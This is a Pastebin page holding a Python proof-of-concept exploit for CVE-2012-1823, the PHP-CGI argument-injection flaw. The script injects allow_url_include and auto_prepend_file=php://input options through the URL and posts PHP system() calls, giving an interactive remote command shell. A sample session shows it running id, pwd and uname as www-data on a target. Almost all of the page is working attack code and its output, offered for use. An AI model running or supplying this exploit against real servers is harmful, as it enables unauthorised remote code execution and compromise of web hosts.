Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # cve-2012-1823 proof of concept
- # twitter: @info_dox
- # website: http://insecurety.net/
- import requests
- import sys
- if len(sys.argv) != 2:
- print "Usage: ./cve-2012-1823.py <target>"
- sys.exit(0)
- target = sys.argv[1]
- url = """http://""" + target + """/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"""
- lol = """<?php system('"""
- lol2 = """');die(); ?>"""
- print "[+] Connecting and spawning a shell..."
- while True:
- try:
- bobcat = raw_input("%s:~$ " %(target))
- lulz = lol + bobcat + lol2
- hax = requests.post(url, lulz)
- print hax.text
- except KeyboardInterrupt:
- print "\n[-] Quitting"
- sys.exit(1)
- """
- [infodox@yore-ma:~]$ ./cve-2012-1823.py 192.168.1.50
- [+] Connecting and spawning a shell...
- 192.168.1.50:~$ id
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- 192.168.1.50:~$ pwd
- /var/www
- 192.168.1.50:~$ uname -a
- Linux debian 2.6.32-5-amd64 #1 SMP Thu Mar 22 17:26:33 UTC 2012 x86_64 GNU/Linux
- 192.168.1.50:~$
- """
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement